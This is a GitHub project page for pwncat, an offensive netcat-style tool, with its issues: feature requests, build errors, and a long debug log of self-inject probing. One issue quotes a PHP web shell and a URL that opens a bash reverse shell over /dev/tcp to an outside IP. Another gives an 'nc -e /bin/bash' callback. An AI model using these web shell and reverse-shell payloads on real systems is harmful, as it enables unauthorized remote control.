cytopia / pwncat

pwncat - netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and it's fully scriptable with Python (PSE)

Home Page: https://pwncat.org

License: MIT License

Languages: Makefile 4.10%, Python 27.20%, Shell 67.10%, Smarty 1.60%
Topics: netcat, ncat, nc, port-forwarding, portforward, remote-shell, bind-shell, reverse-shell, remote-port-forward, remote-port-forwarding

pwncat's People

Contributors

cytopia, dyrtool, noraj, stanlsslav

pwncat's Issues

Implement log levels

Be able to have different log levels via (-v, -vv, -vvv, -vvvv, -vvvvv):

  • error
  • warn
  • info
  • debug
  • trace

windows question

ISSUE TYPE

windows

Question

Does this, including injection, work on Windows?

Great tool by the way.

Please implement ability to port forward after catching reverse shell

ISSUE TYPE

  • Feature request

SUMMARY

Currently, you cannot combine a listener (-l) with a port forward (-L or -R). I would like a way to create a port forward through this tunnel after my listener has caught a reverse shell. I recommend implementing a command in the shell similar to the upload or download commands that will allow you to specify ports to forward. reverse and local shouldn't conflict with any host shell commands, or perhaps reverse-pf and local-pf.

Goal

Often I find that after connecting to a machine I need to add port forwarding for connecting to some service that is running on that machine. I do not currently know an easy way to upgrade a shell with port forwarding other than compiling an exploit and using meterpreter, using plink or chisel, or if I have credentials, using SSH. Most of these require running an additional binary on the host that may or may not be blocked from running.

UDP mode not working in background on GNU/Linux

Hi there,

When running pwncat with the -u option (UDP mode), it does not work in the background on GNU/Linux.

Example:

$ ./bin/pwncat -u -l 127.0.0.1 9999 &
[1]+ Stopped ./bin/pwncat -u -l 127.0.0.1 9999

A few seconds after starting it stops listening on the specified UDP port.

Best Regards,
mt
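The report above shows the listener being stopped as soon as it is backgrounded. The following is an added example, not code from the issue or from pwncat, that shows the check a listener can make before it starts reading stdin. It assumes the "[1]+ Stopped" line is the shell announcing SIGTTIN, which the kernel delivers to a background job when it reads from its controlling terminal; the state names and the helper functions are this example's own.

```python
"""Classify stdin before a listener starts reading it.

Added example, not pwncat's own code. Assumption: the "[1]+ Stopped" line in
the report is the shell announcing that the job got SIGTTIN, the signal the
kernel delivers to a background job the moment it reads from its controlling
terminal. A listener that checks this first can keep serving the socket and
just leave stdin alone.
"""
import errno
import os

FOREGROUND = "foreground-tty"         # safe to read
BACKGROUND = "background-tty"         # a read would stop the job with SIGTTIN
NOT_A_TTY = "not-a-tty"               # pipe, file or /dev/null: reads never stop
FOREIGN_TTY = "tty-not-controlling"   # a terminal, but not this session's


def classify(is_tty, tty_pgrp, own_pgrp):
    """Pure decision so it can be tested without a real terminal.
    tty_pgrp is None when tcgetpgrp() failed with ENOTTY."""
    if not is_tty:
        return NOT_A_TTY
    if tty_pgrp is None:
        return FOREIGN_TTY
    return FOREGROUND if tty_pgrp == own_pgrp else BACKGROUND


def stdin_state(fd=0):
    """Probe a real descriptor; only reads process and terminal metadata."""
    if not os.isatty(fd):
        return classify(False, None, os.getpgrp())
    try:
        tty_pgrp = os.tcgetpgrp(fd)      # foreground process group of the tty
    except OSError as exc:
        if exc.errno != errno.ENOTTY:
            raise
        tty_pgrp = None                  # a tty that is not our controlling one
    return classify(True, tty_pgrp, os.getpgrp())


def should_read_stdin(state):
    """Only a backgrounded job on its controlling tty must not read."""
    return state != BACKGROUND


def stdin_producer_plan(fd=0):
    """What a -l / -u listener should do with stdin, and why."""
    state = stdin_state(fd)
    if should_read_stdin(state):
        return state, "start the STDIN producer thread"
    return state, "skip the STDIN producer: job is backgrounded, a read would trigger SIGTTIN"


def state_of_devnull():
    """Reference point: /dev/null is never a terminal."""
    fd = os.open(os.devnull, os.O_RDONLY)
    try:
        return stdin_state(fd)
    finally:
        os.close(fd)


if __name__ == "__main__":
    print(stdin_producer_plan())
```

Run it in the foreground, then as `python3 check.py &`, to see the two terminal states; redirecting stdin from /dev/null gives the third, which is also the usual way to background a listener without tripping job control.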

connection failed: channel unexpectedly closed

File PHP content:

" . shell_exec($_REQUEST['cmd']) . ""; ?>

URL Exec:
http://192.168.43.6/blog/wp-content/plugins/wp-file-manager/lib/files/injnc2.php?cmd=bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/192.168.43.3/441%3E%261%22

[sudo] password for parrot:
┌─[root@parrot]─[/home/parrot]
└──╼ #pwncat-cs -lp 441
[19:15:38] Welcome to pwncat 🐈! main.py:164
bound to 0.0.0.0:441 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[19:15:55] connection failed: listener aborted manager.py:957
(local) pwncat$ exit
[19:15:57] closing interactive prompt manager.py:957

Any solution?

OS: Parrot OS
PWNCat:
──╼ #pwncat --version
pwncat: Version 0.1.1 (https://github.com/cytopia/pwncat) by cytopia

Implement execute mode

Be able to execute binaries (e.g.: -e /bin/bash or -e cmd.exe) via bind and reverse shells.

Add Keyboard Interrupt Exception

ISSUE TYPE

  • Add a handler for keyboard interrupt events

SUMMARY

When ctrl-c is pressed, you get a prompt to exit the session or continue and ignore

Goal

Further make pwncat ctrl-c proof

Add colorized log output

Implement colorized logging -c/--color with auto, never and always (similar to how grep offers it)
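The two logging issues above (log levels selected by repeated -v, and a tri-state --color flag) describe one configuration problem, so here is one added example that covers both. It is not pwncat's own code: the level numbering for TRACE, the treatment of "no -v at all", the NO_COLOR check and the function names are this example's assumptions.

```python
"""Verbosity flags and tri-state colour handling for a CLI logger.

Added example, not pwncat's own code. Assumptions: -v..-vvvvv select
error/warn/info/debug/trace as the issue lists them, no -v at all shows only
CRITICAL, TRACE is a custom level numbered 5 (below DEBUG = 10), and "auto"
colours only when the output stream is a TTY and NO_COLOR is unset.
"""
import io
import logging
import os
import sys

TRACE = 5                                   # assumed numeric value of the custom level
logging.addLevelName(TRACE, "TRACE")

# index = number of -v flags minus one; more than five -v's clamp to TRACE
LEVELS = [logging.ERROR, logging.WARNING, logging.INFO, logging.DEBUG, TRACE]

ANSI = {"CRITICAL": "\033[1;31m", "ERROR": "\033[31m", "WARNING": "\033[33m",
        "INFO": "\033[32m", "DEBUG": "\033[36m", "TRACE": "\033[35m"}
RESET = "\033[0m"


def level_for_verbosity(count):
    """Map the number of -v flags to a logging level (0 -> CRITICAL only)."""
    if count < 0:
        raise ValueError("verbosity count cannot be negative")
    if count == 0:
        return logging.CRITICAL
    return LEVELS[min(count, len(LEVELS)) - 1]


def use_color(mode, stream, env):
    """Resolve --color like grep: always/never force it, auto probes the stream."""
    if mode == "always":
        return True
    if mode == "never":
        return False
    if mode != "auto":
        raise ValueError("--color must be one of auto, never, always")
    if env.get("NO_COLOR"):                 # https://no-color.org convention
        return False
    return bool(getattr(stream, "isatty", lambda: False)())


class ColorFormatter(logging.Formatter):
    """Wrap each formatted line in the ANSI colour of its level when enabled."""

    def __init__(self, color, fmt="%(asctime)s %(levelname)s [%(threadName)s] %(message)s"):
        super().__init__(fmt)
        self.color = color

    def format(self, record):
        line = super().format(record)
        code = ANSI.get(record.levelname, "") if self.color else ""
        return f"{code}{line}{RESET}" if code else line


def build_logger(verbosity, color_mode="auto", stream=None, env=None, name="pwncat-example"):
    """Create or reconfigure a named logger from the -v count and --color mode."""
    stream = sys.stderr if stream is None else stream
    env = os.environ if env is None else env
    logger = logging.getLogger(name)
    logger.handlers.clear()                 # reconfiguring must not stack handlers
    logger.propagate = False
    logger.setLevel(level_for_verbosity(verbosity))
    handler = logging.StreamHandler(stream)
    handler.setFormatter(ColorFormatter(use_color(color_mode, stream, env)))
    logger.addHandler(handler)
    return logger


def trace(logger, msg, *args):
    """Emit at TRACE; logging.Logger has no .trace() method of its own."""
    logger.log(TRACE, msg, *args)


def render(verbosity, color_mode, env=None):
    """Send one message per level through a fresh logger and return what it
    wrote, so the effect of a given -v count and --color mode can be inspected."""
    buf = io.StringIO()
    logger = build_logger(verbosity, color_mode, stream=buf,
                          env={} if env is None else env, name="pwncat-example-render")
    trace(logger, "trace message")
    logger.debug("debug message")
    logger.info("info message")
    logger.warning("warning message")
    logger.error("error message")
    return buf.getvalue()


if __name__ == "__main__":
    for count in range(6):
        print(f"verbosity={count}\n{render(count, 'auto')}")
```

The `auto` branch is the one worth getting right: colour codes written into a file or a pipe (for example a log shipped to a SIEM) corrupt the lines, so the decision is made per stream rather than once per process.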

setup.py: Multiple top-level packages discovered in a flat-layout

 * Build system packages:
 *   dev-python/setuptools         : 62.1.0-r1
>>> Source prepared.
>>> Configuring source in /var/tmp/portage/net-analyzer/pwncat-0.1.2/work/pwncat-0.1.2 ...
>>> Source configured.
>>> Compiling source in /var/tmp/portage/net-analyzer/pwncat-0.1.2/work/pwncat-0.1.2 ...
 * python3_9: running distutils-r1_run_phase distutils-r1_python_compile
python3.9 setup.py build -j 12
/usr/lib/python3.9/site-packages/setuptools/dist.py:757: UserWarning: Usage of dash-separated 'description-file' will not be supported in future versions. Please use the underscore name 'description_file' instead
  warnings.warn(
error: Multiple top-level packages discovered in a flat-layout: ['pse', 'man', 'art', 'share'].

To avoid accidental inclusion of unwanted files or directories,
setuptools will not proceed with this build.

If you are trying to create a single distribution with multiple packages
on purpose, you should not rely on automatic discovery.
Instead, consider the following options:

1. set up custom discovery (`find` directive with `include` or `exclude`)
2. use a `src-layout`
3. explicitly set `py_modules` or `packages` with a list of names

Implement reconnect

Implement reconnect (--reconn) and reconnect wait time (--recon-wait). The reconnect option is only used after a successful initial connection has already been made.

__ROADMAP__

Roadmap

This issue will stay open and serves as a public Roadmap to show what needs to be done until a release will be ready. Comments serve for discussion and to gather new features.

Release v0.1.0

The current implementation of pwncat is in alpha state as not all features are available. This will be the first feature-ready release.

  • #19 implement Connect mode
  • #20 implement -l - listen mode
  • #21 implement -u - udp connections
  • #22 implement --crlf - change to windows linefeeds
  • #23 implement -v - verbosity
  • #24 implement -e - command execution
  • #25 implement -n - don't resolve DNS
  • #30 implement -L - local port forwarding
  • #31 implement -R - remote port forwarding
  • #32 implement -z - port scan mode / zero io mode
  • #53 implement --keep - keep listening for new connection (TCP)
  • #28 implement --reconn - re-try outbound connection periodically
  • #28 implement --reconn-wait - wait between re-try attempts
  • #43 implement --reconn-robin - (client only) round robin change outbound ports
  • #44 implement --rebind - try to rebind if it fails (only during init phase)
  • #45 implement --rebind-wait - wait between re-rebind attempts
  • #46 implement --rebind-robin - round robin re-bind attempts
  • #29 implement --udp-ping-intvl - faking a TCP-like stateful connection over UDP
  • #47 change --udp-ping-intvl to --ping-intvl (to allow TCP as well)
  • #48 Implement --ping-init - single initial ping
  • #49 Implement --ping-word - what char/string to send as ping
  • #50 Implement --ping-robin - round-robin ports while pinging
  • #51 Implement --safe-word - shut down remote end immediately
  • #62 Pwncat Scripting Engine (PSE) with --script-send and --script-recv
  • IPv6 support
  • #79 implement --udp-sconnect - stateless UDP connect
  • #55 Make positional port argument accept multiple values

Future Releases

Gathering ideas for future releases.

  • Provide binaries for Linux, MacOS and Windows (in case Python is not available)
  • implement daemonize for headless execution -d
  • --http - tunnel via http
  • --https - tunnel via https

Netcat Compatibility

Trying to send a connection from netcat to pwncat; is that possible?

Victim machine command injection:
nc IP PORT -e /bin/bash

On my attacking machine:
pwncat -l IP PORT

It fails with the following error whenever a command is run; the connection does get accepted.
ERROR: Socket OS Error: [Errno 9] Bad file descriptor

Pwncat Scripting Engine (PSE)

  • Feature request

SUMMARY

Add support for Python scripting with external files

Goal

Be able to modify send and/or received data via custom Python scripts.

IPv6 self injection / port forwarding

ISSUE TYPE

  • Feature request

SUMMARY

Thanks for sharing your awesome tool. Self injection and port forwarding are so cool!
However, it seems only IPv4 addresses are supported for those features.

: is already used as the separator for those options,
so an SSH-style port-forwarding notation for IPv6 (the address surrounded by []) may be better.

$ pwncat -l 4444 --self-inject /bin/bash:[xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx]:4445
$ pwncat -R [xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx]:4444 10.0.0.1 3306
$ pwncat -L [xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx]:5000 10.0.0.1 3306

I tried to implement it this way.
Please see this change (it seems to work, and passed make code/make lint).
If this is OK, I will open a new PR for it. What do you think?

Goal

We can specify an IPv6 address for --self-inject/-R/-L.
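The bracket notation proposed in this issue needs a parser that is unambiguous for IPv4, hostnames and IPv6 alike. The following is an added example and not pwncat's implementation; the grammar, the `Endpoint` type and the function names are assumptions. It goes one step beyond the issue: it also accepts a `%scope` inside the brackets and converts the result into the 4-tuple that IPv6 sockets need, because a link-local address without an interface index is the "Invalid argument" failure reported further down this page.

```python
"""Endpoint parsing with bracketed IPv6, for -L/-R/--self-inject style options.

Added example, not pwncat's own code. Assumed grammar (from the issue):
    HOST:PORT            hostname or IPv4 literal
    [IPV6]:PORT          IPv6 literal in brackets, as ssh and curl write it
    [IPV6%SCOPE]:PORT    link-local address with an interface name or index
and, for --self-inject, a leading COMMAND: component.
"""
import ipaddress
import re
import socket
from typing import NamedTuple, Optional


class Endpoint(NamedTuple):
    host: str
    port: int
    scope: Optional[str]   # "eth0", "2" or None
    family: int            # 4 or 6 for literals, 0 for a hostname


_BRACKETED = re.compile(r"^\[([^\[\]]+)\]:(\d{1,5})$")
_PLAIN = re.compile(r"^([^:\[\]]+):(\d{1,5})$")


def _port(text):
    port = int(text)
    if not 1 <= port <= 65535:
        raise ValueError(f"port {port} out of range")
    return port


def parse_endpoint(spec):
    """Turn 'host:port', '[v6]:port' or '[v6%scope]:port' into an Endpoint."""
    m = _BRACKETED.match(spec)
    if m:
        addr, _, scope = m.group(1).partition("%")
        ip = ipaddress.ip_address(addr)           # ValueError on junk
        if ip.version != 6:
            raise ValueError("brackets are only valid around IPv6 addresses")
        return Endpoint(str(ip), _port(m.group(2)), scope or None, 6)
    m = _PLAIN.match(spec)
    if not m:
        raise ValueError(f"cannot parse {spec!r}; write IPv6 as [addr]:port")
    host = m.group(1)
    try:
        family = ipaddress.ip_address(host).version
    except ValueError:
        family = 0                                # a hostname, resolved later
    return Endpoint(host, _port(m.group(2)), None, family)


def is_valid_endpoint(spec):
    try:
        parse_endpoint(spec)
        return True
    except ValueError:
        return False


def parse_self_inject(spec):
    """'/bin/bash:[::1]:4445' -> ('/bin/bash', Endpoint). The command is
    everything before the first ':'; the rest follows the endpoint grammar."""
    cmd, sep, rest = spec.partition(":")
    if not sep or not cmd:
        raise ValueError("expected COMMAND:HOST:PORT")
    return cmd, parse_endpoint(rest)


def scope_index(ep):
    """Interface index for the %scope: numeric as given, names via the OS."""
    if ep.scope is None:
        return 0
    return int(ep.scope) if ep.scope.isdigit() else socket.if_nametoindex(ep.scope)


def link_local_without_scope(ep):
    """fe80::/10 needs an interface index; with 0 the kernel typically
    refuses bind()/connect() with EINVAL (Invalid argument)."""
    return ep.family == 6 and ipaddress.IPv6Address(ep.host).is_link_local and scope_index(ep) == 0


def to_sockaddr(ep):
    """Build the tuple socket.bind()/connect() expect for this family."""
    if ep.family != 6:
        return (ep.host, ep.port)
    if link_local_without_scope(ep):
        raise ValueError(f"{ep.host} is link-local; write it as [{ep.host}%IFACE]:{ep.port}")
    return (ep.host, ep.port, 0, scope_index(ep))


if __name__ == "__main__":
    for spec in ("10.0.0.1:3306", "[2001:db8::1]:4444", "[fe80::1%eth0]:4445"):
        print(spec, "->", parse_endpoint(spec))
```

Unbracketed IPv6 such as `2001:db8::1:4444` is rejected on purpose: the last `:` could be either part of the address or the port separator, and guessing there is how a forward ends up pointed at the wrong host.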

Add SSL WRAPPER

ISSUE TYPE

  • Add feature to wrap sockets in SSL tunnel either dynamically (change the SSL certs/create certs on system) or statically (certs pre-pasted in pwncat)

SUMMARY

Would like to be able to set up 2 pwncat instances (client and server) and have the option to make the communications encrypted. I see the easiest way to do this is to create a flag --ssl which then wraps the socket; the pwncat server would also then need a method to try via normal communications and, if that fails, try the SSL function.

Goal

The goal is to encrypt the stream, which would further evade network detection/protection systems.

Similar to #83, --self-inject does not detect python because client does not send server output of remote_command

ISSUE TYPE

  • Bug Report

OS / ENVIRONMENT

  1. Operating system: Linux
  2. Python version: 2.7, 3.9

Server:

./pwncat -l 192.168.10.184 9999 --self-inject /bin/sh:192.168.10.184:10000 -vvvvv
2022-08-09 13:43:45,186 DEBUG [MainThread] 3396:__init__(): STDOUT isatty: True
2022-08-09 13:43:45,186 DEBUG [MainThread] 3397:__init__(): STDIN  isatty: True
2022-08-09 13:43:45,186 DEBUG [MainThread] 3398:__init__(): STDIN  posix:  False (posix)
2022-08-09 13:43:45,186 DEBUG [MainThread] 1465:create_socket(): Creating (family 10/IPv6, TCP) socket
2022-08-09 13:43:45,186 DEBUG [MainThread] 1485:create_socket(): Disabling IPv4 support on IPv6 socket
2022-08-09 13:43:45,186 DEBUG [MainThread] 1465:create_socket(): Creating (family 2/IPv4, TCP) socket
2022-08-09 13:43:45,186 DEBUG [MainThread] 1414:gethostbyname(): Resolving IPv4 name not required, changing to IPv6: ::ffff:192.168.10.184
2022-08-09 13:43:45,186 DEBUG [MainThread] 1418:gethostbyname(): Resolving IPv4 host not required, already an IP: 192.168.10.184
2022-08-09 13:43:45,187 DEBUG [MainThread] 1517:bind(): Binding (family 10/IPv6, TCP) socket to ::ffff:192.168.10.184:9999
2022-08-09 13:43:45,187 DEBUG [MainThread] 1517:bind(): Binding (family 2/IPv4, TCP) socket to 192.168.10.184:9999
2022-08-09 13:43:45,187 DEBUG [MainThread] 2214:run_server(): Removing (family 10/IPv6) due to: Binding (family 10/IPv6, TCP) socket to ::ffff:192.168.10.184:9999 failed: [Errno 22] Invalid argument
2022-08-09 13:43:45,187 DEBUG [MainThread] 1545:listen(): Listening with backlog=0
2022-08-09 13:43:45,187 INFO [MainThread] 2247:run_server(): Listening on 192.168.10.184:9999 (family 2/IPv4, TCP)
2022-08-09 13:43:45,187 DEBUG [MainThread] 1574:accept(): Waiting for TCP client
2022-08-09 13:44:25,264 INFO [MainThread] 1591:accept(): Client connected from 192.168.10.254:5555 (family 2/IPv4, TCP)
[PWNCAT CnC] Checking if remote sends greeting...
2022-08-09 13:44:25,615 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.350531 sec in 1/5 rounds
2022-08-09 13:44:25,965 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.701250 sec in 2/5 rounds
2022-08-09 13:44:26,316 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.051963 sec in 3/5 rounds
2022-08-09 13:44:26,667 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.402650 sec in 4/5 rounds
2022-08-09 13:44:27,017 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.753344 sec in 5/5 rounds
[PWNCAT CnC] Checking if remote sends prefix/suffix to every request...
2022-08-09 13:44:27,018 DEBUG [MainThread] 1898:send(): Trying to send 15 bytes to 192.168.10.254:5555
2022-08-09 13:44:27,018 TRACE [MainThread] 1904:send(): Trying to send: b'echo "__pwn__"\n'
2022-08-09 13:44:27,018 DEBUG [MainThread] 1921:send(): Sent 15 bytes to 192.168.10.254:5555 (0 bytes remaining)
2022-08-09 13:44:27,368 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.350471 sec in 1/5 rounds
2022-08-09 13:44:27,719 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.701191 sec in 2/5 rounds
2022-08-09 13:44:28,070 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.051911 sec in 3/5 rounds
2022-08-09 13:44:28,420 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.402645 sec in 4/5 rounds
2022-08-09 13:44:28,771 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.753336 sec in 5/5 rounds
2022-08-09 13:44:28,771 DEBUG [MainThread] 4771:__set_remote_prefix(): Set suffix before: []
2022-08-09 13:44:28,771 DEBUG [MainThread] 4773:__set_remote_prefix(): Set suffix after:  []
[PWNCAT CnC] Remote does not send prefix
[PWNCAT CnC] Remote does not send suffix
2022-08-09 13:44:28,772 DEBUG [MainThread] 4827:__set_remote_python_path(): Probing for: which python3
2022-08-09 13:44:28,772 DEBUG [MainThread] 1898:send(): Trying to send 26 bytes to 192.168.10.254:5555
2022-08-09 13:44:28,772 TRACE [MainThread] 1904:send(): Trying to send: b'which python3 2>/dev/null\n'
2022-08-09 13:44:28,772 DEBUG [MainThread] 1921:send(): Sent 26 bytes to 192.168.10.254:5555 (0 bytes remaining)
2022-08-09 13:44:29,122 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.350484 sec in 1/5 rounds
2022-08-09 13:44:29,473 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.701201 sec in 2/5 rounds
2022-08-09 13:44:29,824 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.051899 sec in 3/5 rounds
2022-08-09 13:44:30,175 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.402663 sec in 4/5 rounds
2022-08-09 13:44:30,525 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.753401 sec in 5/5 rounds
[PWNCAT CnC] Response:
2022-08-09 13:44:30,526 DEBUG [MainThread] 4827:__set_remote_python_path(): Probing for: which python
2022-08-09 13:44:30,526 DEBUG [MainThread] 1898:send(): Trying to send 25 bytes to 192.168.10.254:5555
2022-08-09 13:44:30,526 TRACE [MainThread] 1904:send(): Trying to send: b'which python 2>/dev/null\n'
2022-08-09 13:44:30,526 DEBUG [MainThread] 1921:send(): Sent 25 bytes to 192.168.10.254:5555 (0 bytes remaining)
2022-08-09 13:44:30,877 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.350487 sec in 1/5 rounds
2022-08-09 13:44:31,228 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.701441 sec in 2/5 rounds
2022-08-09 13:44:31,579 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.052403 sec in 3/5 rounds
2022-08-09 13:44:31,930 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.403363 sec in 4/5 rounds
2022-08-09 13:44:32,281 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.754384 sec in 5/5 rounds
[PWNCAT CnC] Response:
2022-08-09 13:44:32,282 DEBUG [MainThread] 4827:__set_remote_python_path(): Probing for: which python2
2022-08-09 13:44:32,282 DEBUG [MainThread] 1898:send(): Trying to send 26 bytes to 192.168.10.254:5555
2022-08-09 13:44:32,283 TRACE [MainThread] 1904:send(): Trying to send: b'which python2 2>/dev/null\n'
2022-08-09 13:44:32,283 DEBUG [MainThread] 1921:send(): Sent 26 bytes to 192.168.10.254:5555 (0 bytes remaining)
2022-08-09 13:44:32,634 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.350500 sec in 1/5 rounds
2022-08-09 13:44:32,985 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.701460 sec in 2/5 rounds
2022-08-09 13:44:33,336 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.052369 sec in 3/5 rounds
2022-08-09 13:44:33,687 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.403336 sec in 4/5 rounds
2022-08-09 13:44:34,038 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.754300 sec in 5/5 rounds
[PWNCAT CnC] Response:
2022-08-09 13:44:34,038 DEBUG [MainThread] 4827:__set_remote_python_path(): Probing for: which python2.7
2022-08-09 13:44:34,038 DEBUG [MainThread] 1898:send(): Trying to send 28 bytes to 192.168.10.254:5555
2022-08-09 13:44:34,039 TRACE [MainThread] 1904:send(): Trying to send: b'which python2.7 2>/dev/null\n'
2022-08-09 13:44:34,039 DEBUG [MainThread] 1921:send(): Sent 28 bytes to 192.168.10.254:5555 (0 bytes remaining)
2022-08-09 13:44:34,390 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.350504 sec in 1/5 rounds
2022-08-09 13:44:34,741 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.701578 sec in 2/5 rounds
2022-08-09 13:44:35,092 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.052568 sec in 3/5 rounds
2022-08-09 13:44:35,443 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.403498 sec in 4/5 rounds
2022-08-09 13:44:35,794 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.754471 sec in 5/5 rounds
[PWNCAT CnC] Response:
2022-08-09 13:44:35,794 DEBUG [MainThread] 4827:__set_remote_python_path(): Probing for: which python3.5
2022-08-09 13:44:35,794 DEBUG [MainThread] 1898:send(): Trying to send 28 bytes to 192.168.10.254:5555
2022-08-09 13:44:35,795 TRACE [MainThread] 1904:send(): Trying to send: b'which python3.5 2>/dev/null\n'
2022-08-09 13:44:35,795 DEBUG [MainThread] 1921:send(): Sent 28 bytes to 192.168.10.254:5555 (0 bytes remaining)
2022-08-09 13:44:36,145 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.350499 sec in 1/5 rounds
2022-08-09 13:44:36,496 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.701473 sec in 2/5 rounds
2022-08-09 13:44:36,847 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.052447 sec in 3/5 rounds
2022-08-09 13:44:37,198 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.403437 sec in 4/5 rounds
2022-08-09 13:44:37,549 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.754413 sec in 5/5 rounds
[PWNCAT CnC] Response:
2022-08-09 13:44:37,550 DEBUG [MainThread] 4827:__set_remote_python_path(): Probing for: which python3.6
2022-08-09 13:44:37,550 DEBUG [MainThread] 1898:send(): Trying to send 28 bytes to 192.168.10.254:5555
2022-08-09 13:44:37,550 TRACE [MainThread] 1904:send(): Trying to send: b'which python3.6 2>/dev/null\n'
2022-08-09 13:44:37,550 DEBUG [MainThread] 1921:send(): Sent 28 bytes to 192.168.10.254:5555 (0 bytes remaining)
2022-08-09 13:44:37,901 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.350496 sec in 1/5 rounds
2022-08-09 13:44:38,252 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.701492 sec in 2/5 rounds
2022-08-09 13:44:38,603 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.052461 sec in 3/5 rounds
2022-08-09 13:44:38,954 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.403419 sec in 4/5 rounds
2022-08-09 13:44:39,305 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.754393 sec in 5/5 rounds
[PWNCAT CnC] Response:
2022-08-09 13:44:39,306 DEBUG [MainThread] 4827:__set_remote_python_path(): Probing for: which python3.7
2022-08-09 13:44:39,306 DEBUG [MainThread] 1898:send(): Trying to send 28 bytes to 192.168.10.254:5555
2022-08-09 13:44:39,306 TRACE [MainThread] 1904:send(): Trying to send: b'which python3.7 2>/dev/null\n'
2022-08-09 13:44:39,306 DEBUG [MainThread] 1921:send(): Sent 28 bytes to 192.168.10.254:5555 (0 bytes remaining)
2022-08-09 13:44:39,657 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.350509 sec in 1/5 rounds
2022-08-09 13:44:40,008 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.701510 sec in 2/5 rounds
2022-08-09 13:44:40,359 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.052515 sec in 3/5 rounds
2022-08-09 13:44:40,710 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.403461 sec in 4/5 rounds
2022-08-09 13:44:41,061 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.754383 sec in 5/5 rounds
[PWNCAT CnC] Response:
2022-08-09 13:44:41,061 DEBUG [MainThread] 4827:__set_remote_python_path(): Probing for: which python3.8
2022-08-09 13:44:41,061 DEBUG [MainThread] 1898:send(): Trying to send 28 bytes to 192.168.10.254:5555
2022-08-09 13:44:41,062 TRACE [MainThread] 1904:send(): Trying to send: b'which python3.8 2>/dev/null\n'
2022-08-09 13:44:41,062 DEBUG [MainThread] 1921:send(): Sent 28 bytes to 192.168.10.254:5555 (0 bytes remaining)
2022-08-09 13:44:41,413 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.350526 sec in 1/5 rounds
2022-08-09 13:44:41,764 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.701422 sec in 2/5 rounds
2022-08-09 13:44:42,115 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.052393 sec in 3/5 rounds
2022-08-09 13:44:42,465 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.403347 sec in 4/5 rounds
2022-08-09 13:44:42,816 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.754319 sec in 5/5 rounds
[PWNCAT CnC] Response:
[PWNCAT CnC] Probing for: /usr/bin/python3
2022-08-09 13:44:42,817 DEBUG [MainThread] 1898:send(): Trying to send 58 bytes to 192.168.10.254:5555
2022-08-09 13:44:42,818 TRACE [MainThread] 1904:send(): Trying to send: b'test -f /usr/bin/python3 && echo /usr/bin/python3 || echo\n'
2022-08-09 13:44:42,818 DEBUG [MainThread] 1921:send(): Sent 58 bytes to 192.168.10.254:5555 (0 bytes remaining)
2022-08-09 13:44:43,169 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.350547 sec in 1/5 rounds
2022-08-09 13:44:43,520 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.701487 sec in 2/5 rounds
